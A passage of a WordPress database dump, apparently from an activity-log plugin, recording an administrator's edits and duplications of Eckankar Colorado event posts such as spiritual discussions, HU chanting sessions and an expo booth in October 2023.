Celebration'),(216208,35630,'_message_key','post_updated'),(216209,35630,'_user_id','2'),(216210,35630,'_user_login','S8zhaBda'),(216211,35630,'_user_email','nada@zipnadanot.org'),(216212,35630,'_server_remote_addr','76.130.120.x'),(216213,35630,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216214,35631,'post_id','269140'),(216215,35631,'post_type','mec-events'),(216216,35631,'post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216217,35631,'_message_key','post_updated'),(216218,35631,'_user_id','2'),(216219,35631,'_user_login','S8zhaBda'),(216220,35631,'_user_email','nada@zipnadanot.org'),(216221,35631,'_server_remote_addr','76.130.120.x'),(216222,35631,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216223,35632,'post_id','269143'),(216224,35632,'post_type','mec-events'),(216225,35632,'post_title','ELSS LIVE STREAMING for COLORADO SPRINGS TEMPLATE | Benefit Title goes here'),(216226,35632,'_message_key','post_updated'),(216227,35632,'_user_id','2'),(216228,35632,'_user_login','S8zhaBda'),(216229,35632,'_user_email','nada@zipnadanot.org'),(216230,35632,'_server_remote_addr','76.130.120.x'),(216231,35632,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(216232,35633,'new_post_title','ELSS LIVE STREAMING for COLORADO SPRINGS TEMPLATE | Benefit Title goes here'),(216233,35633,'new_post_id','269143'),(216234,35633,'duplicated_post_title','ELSS LIVE STREAMING for COLORADO SPRINGS TEMPLATE | Benefit Title goes here'),(216235,35633,'duplicated_post_id','268843'),(216236,35633,'_message_key','post_duplicated'),(216237,35633,'_user_id','2'),(216238,35633,'_user_login','S8zhaBda'),(216239,35633,'_user_email','nada@zipnadanot.org'),(216240,35633,'_server_remote_addr','76.130.120.x'),(216241,35633,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(216242,35634,'post_id','269143'),(216243,35634,'post_type','mec-events'),(216244,35634,'post_title','ELSS LIVE STREAMING for COLORADO SPRINGS'),(216245,35634,'post_prev_post_title','ELSS LIVE STREAMING for COLORADO SPRINGS TEMPLATE | Benefit Title goes here'),(216246,35634,'post_new_post_title','ELSS LIVE STREAMING for COLORADO SPRINGS'),(216247,35634,'post_prev_post_name',''),(216248,35634,'post_new_post_name','elss-live-streaming-for-colorado-springs'),(216249,35634,'post_prev_post_status','draft'),(216250,35634,'post_new_post_status','publish'),(216251,35634,'post_prev_post_date','2023-10-02 13:51:04'),(216252,35634,'post_new_post_date','2023-10-02 13:51:55'),(216253,35634,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(216254,35634,'post_new_post_date_gmt','2023-10-02 19:51:55'),(216255,35634,'_message_key','post_updated'),(216256,35634,'_user_id','2'),(216257,35634,'_user_login','S8zhaBda'),(216258,35634,'_user_email','nada@zipnadanot.org'),(216259,35634,'_server_remote_addr','76.130.120.x'),(216260,35634,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269143'),(216261,35635,'post_id','269143'),(216262,35635,'post_type','mec-events'),(216263,35635,'post_title','ELSS LIVE STREAMING for COLORADO SPRINGS'),(216264,35635,'_message_key','post_updated'),(216265,35635,'_user_id','2'),(216266,35635,'_user_login','S8zhaBda'),(216267,35635,'_user_email','nada@zipnadanot.org'),(216268,35635,'_server_remote_addr','76.130.120.x'),(216269,35635,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269143&action=edit'),(216270,35636,'post_id','269144'),(216271,35636,'post_type','mec-events'),(216272,35636,'post_title','Video and Spiritual Discussion &#8211; COLORADO SPRINGS TEMPLATE | Title Goes Here'),(216273,35636,'_message_key','post_updated'),(216274,35636,'_user_id','2'),(216275,35636,'_user_login','S8zhaBda'),(216276,35636,'_user_email','nada@zipnadanot.org'),(216277,35636,'_server_remote_addr','76.130.120.x'),(216278,35636,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(216279,35637,'new_post_title','Video and Spiritual Discussion - COLORADO SPRINGS TEMPLATE | Title Goes Here'),(216280,35637,'new_post_id','269144'),(216281,35637,'duplicated_post_title','Video and Spiritual Discussion - COLORADO SPRINGS TEMPLATE | Title Goes Here'),(216282,35637,'duplicated_post_id','268962'),(216283,35637,'_message_key','post_duplicated'),(216284,35637,'_user_id','2'),(216285,35637,'_user_login','S8zhaBda'),(216286,35637,'_user_email','nada@zipnadanot.org'),(216287,35637,'_server_remote_addr','76.130.120.x'),(216288,35637,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(216289,35638,'post_id','269144'),(216290,35638,'post_type','mec-events'),(216291,35638,'post_title','Five Spiritual Laws of This World'),(216292,35638,'post_meta_added','73'),(216293,35638,'_message_key','post_updated'),(216294,35638,'_user_id','2'),(216295,35638,'_user_login','S8zhaBda'),(216296,35638,'_user_email','nada@zipnadanot.org'),(216297,35638,'_server_remote_addr','76.130.120.x'),(216298,35638,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269144'),(216299,35639,'post_type','attachment'),(216300,35639,'attachment_id','269145'),(216301,35639,'attachment_title','sunset-lake-6'),(216302,35639,'attachment_filename','sunset-lake-6.jpg'),(216303,35639,'attachment_mime','image/jpeg'),(216304,35639,'attachment_filesize','110956'),(216305,35639,'attachment_parent_id','269144'),(216306,35639,'attachment_parent_title','Five Spiritual Laws of This World'),(216307,35639,'attachment_parent_post_type','mec-events'),(216308,35639,'_message_key','attachment_created'),(216309,35639,'_user_id','2'),(216310,35639,'_user_login','S8zhaBda'),(216311,35639,'_user_email','nada@zipnadanot.org'),(216312,35639,'_server_remote_addr','76.130.120.x'),(216313,35639,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269144'),(216314,35640,'post_id','269144'),(216315,35640,'post_type','mec-events'),(216316,35640,'post_title','Five Spiritual Laws of This World'),(216317,35640,'post_prev_post_name',''),(216318,35640,'post_new_post_name','five-spiritual-laws-of-this-world'),(216319,35640,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><span style=\"font-size: 18pt; color: #eb9809;\">Video and Spiritual Discussion.</span> <br>\n</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to watch a 30 minute video presentation of a talk by Sri Harold Klemp, Spiritual Leader of Eckankar. It will be followed by a discussion on the spiritual topics mentioned in the talk. Come and share your thoughts and insights with other like-minded individuals.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Video presentations of Sri Harold Klemp offer a unique opportunity to hear stories and spiritual insights that bring meaning, connection, and humor to the workings of Spirit in our everyday lives.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">All are warmly welcome.</span></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(216320,35640,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 14pt;\"><span style=\"font-size: 18pt; color: #eb9809;\">Video and Spiritual Discussion.</span> <br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to watch a 30 minute video presentation of a talk by Sri Harold Klemp, Spiritual Leader of Eckankar. It will be followed by a discussion on the spiritual topics mentioned in the talk. Come and share your thoughts and insights with other like-minded individuals.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Video presentations of Sri Harold Klemp offer a unique opportunity to hear stories and spiritual insights that bring meaning, connection, and humor to the workings of Spirit in our everyday lives.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">All are warmly welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216321,35640,'post_prev_post_status','draft'),(216322,35640,'post_new_post_status','publish'),(216323,35640,'post_prev_post_date','2023-10-02 13:57:33'),(216324,35640,'post_new_post_date','2023-10-02 14:02:05'),(216325,35640,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(216326,35640,'post_new_post_date_gmt','2023-10-02 20:02:05'),(216327,35640,'post_new_thumb_id','269145'),(216328,35640,'post_new_thumb_title','sunset-lake-6'),(216329,35640,'_message_key','post_updated'),(216330,35640,'_user_id','2'),(216331,35640,'_user_login','S8zhaBda'),(216332,35640,'_user_email','nada@zipnadanot.org'),(216333,35640,'_server_remote_addr','76.130.120.x'),(216334,35640,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269144'),(216335,35641,'post_id','268265'),(216336,35641,'post_type','mec-events'),(216337,35641,'post_title','How to Enliven Every Aspect of Your Life'),(216338,35641,'post_prev_post_title','Develop a Powerful Spiritual Practice'),(216339,35641,'post_new_post_title','How to Enliven Every Aspect of Your Life'),(216340,35641,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #c9a11a;\">Easy Ways to Connect with Divine Spirit Every Day. <br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216341,35641,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt; color: #c9a11a;\">Access the God Current with HU. <br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You’re invited to experience chanting <strong>HU</strong>, contemplative time, and spiritual conversation with others of like heart.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The program experience includes a personal introduction by the facilitator, the reading of a short ECK quote, singing HU for 15 to 20 minutes, and ends with a silent contemplation for a few minutes. HU is an ancient name for God that has been sung for thousands of years in many lands for spiritual unfoldment. It can uplift people of any religion, culture, or walk of life. Here are some of the many benefits of HU:</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"font-size: 14pt;\">Inner peace and calm</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Divine love</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Expanded awareness</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Spiritual self-discovery and growth</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Healing of the heart</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Stay afterward for spiritual discussion, light refreshments and fellowship.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216342,35641,'_message_key','post_updated'),(216343,35641,'_user_id','2'),(216344,35641,'_user_login','S8zhaBda'),(216345,35641,'_user_email','nada@zipnadanot.org'),(216346,35641,'_server_remote_addr','76.130.120.x'),(216347,35641,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268265&action=edit'),(216348,35642,'post_id','269140'),(216349,35642,'post_type','mec-events'),(216350,35642,'post_title','Eckankar Booth at Body Mind Spirit Celebration'),(216351,35642,'post_prev_post_title','ECKANKAR BOOTH at Body Mind Spirit Celebration'),(216352,35642,'post_new_post_title','Eckankar Booth at Body Mind Spirit Celebration'),(216353,35642,'_message_key','post_updated'),(216354,35642,'_user_id','2'),(216355,35642,'_user_login','S8zhaBda'),(216356,35642,'_user_email','nada@zipnadanot.org'),(216357,35642,'_server_remote_addr','76.130.120.x'),(216358,35642,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269140&action=edit'),(216359,35643,'post_id','269146'),(216360,35643,'post_type','mec-events'),(216361,35643,'post_title','Eckankar Booth at Body Mind Spirit Celebration'),(216362,35643,'_message_key','post_updated'),(216363,35643,'_user_id','2'),(216364,35643,'_user_login','S8zhaBda'),(216365,35643,'_user_email','nada@zipnadanot.org'),(216366,35643,'_server_remote_addr','76.130.120.x'),(216367,35643,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=eckankar+booth&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(216368,35644,'new_post_title','Eckankar Booth at Body Mind Spirit Celebration'),(216369,35644,'new_post_id','269146'),(216370,35644,'duplicated_post_title','Eckankar Booth at Body Mind Spirit Celebration'),(216371,35644,'duplicated_post_id','269140'),(216372,35644,'_message_key','post_duplicated'),(216373,35644,'_user_id','2'),(216374,35644,'_user_login','S8zhaBda'),(216375,35644,'_user_email','nada@zipnadanot.org'),(216376,35644,'_server_remote_addr','76.130.120.x'),(216377,35644,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=eckankar+booth&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(216378,35645,'post_id','269146'),(216379,35645,'post_type','mec-events'),(216380,35645,'post_title','Eckankar Booth at Spiritual Fairs and Expos-'),(216381,35645,'post_new_thumb_id','269141'),(216382,35645,'post_new_thumb_title','2023-body-mind-spirit-expo'),(216383,35645,'post_meta_added','78'),(216384,35645,'_message_key','post_updated'),(216385,35645,'_user_id','2'),(216386,35645,'_user_login','S8zhaBda'),(216387,35645,'_user_email','nada@zipnadanot.org'),(216388,35645,'_server_remote_addr','76.130.120.x'),(216389,35645,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269146'),(216390,35646,'post_id','269146'),(216391,35646,'post_type','mec-events'),(216392,35646,'post_title','Eckankar Booth at (Spiritual Fairs and Expos&#8211; ADD TITLE OF FAIR OR EXPO) TEMPLATE'),(216393,35646,'post_prev_post_title','Eckankar Booth at Spiritual Fairs and Expos-'),(216394,35646,'post_new_post_title','Eckankar Booth at (Spiritual Fairs and Expos-- ADD TITLE OF FAIR OR EXPO) TEMPLATE'),(216395,35646,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\n</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">Friday thru Sunday -- October 6 - 8<br>\n</span><span style=\"font-size: 14pt;\">At the Colorado Springs Event Center </span></strong><br>\n<strong><span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span></strong><br>\n<strong><span style=\"font-size: 14pt;\">Colorado Springs, CO</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\n</div>\n</div>\n</div>\n</div>'),(216396,35646,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">We look forward to connecting with you! Please visit us and share your experiences, questions and love of all things spiritual.<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Do you want to learn more about how to discover the meaning of your dreams?</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Maybe you would like to learn more about Past Lives or Soul Travel.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This is a great opportunity to speak with members of Eckankar, browse materials to learn on your own, or just to have a chat. We would love to see you there.</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><strong><span style=\"font-size: 14pt;\">Friday thru Sunday -- October 6 - 8<br>\r\n</span><span style=\"font-size: 14pt;\">At the Colorado Springs Event Center </span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">3960 Palmer Park Blvd.</span></strong><br>\r\n<strong><span style=\"font-size: 14pt;\">Colorado Springs, CO</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Whatever your spiritual interest, please stop by and say hello.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Bring your friends!</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(216397,35646,'post_prev_post_date','2023-10-02 14:10:26'),(216398,35646,'post_new_post_date','2023-10-02 14:11:23'),(216399,35646,'_message_key','post_updated'),(216400,35646,'_user_id','2'),(216401,35646,'_user_login','S8zhaBda'),(216402,35646,'_user_email','nada@zipnadanot.org'),(216403,35646,'_server_remote_addr','76.130.120.x'),(216404,35646,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269146'),(216405,35647,'post_id','269147'),(216406,35647,'post_type','mec-events'),(216407,35647,'post_title','ROUNDTABLE TEMPLATE &#8211; We don&#8217;t use that term &#8220;Roundtable&#8221; anymore &#8211; it&#8217;s a Spiritual Discussion | Title Goes Here'),(216408,35647,'_message_key','post_updated'),(216409,35647,'_user_id','2'),(216410,35647,'_user_login','S8zhaBda'),(216411,35647,'_user_email','nada@zipnadanot.org'),(216412,35647,'_server_remote_addr','76.130.120.x'),(216413,35647,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&action2=-1&orderby=title&order=asc'),(216414,35648,'new_post_title','ROUNDTABLE TEMPLATE - We don\'t use that term \"Roundtable\" anymore - it\'s a Spiritual Discussion | Title Goes Here'),(216415,35648,'new_post_id','269147'),(216416,35648,'duplicated_post_title','ROUNDTABLE TEMPLATE - We don\'t use that term \"Roundtable\" anymore - it\'s a Spiritual Discussion | Title Goes 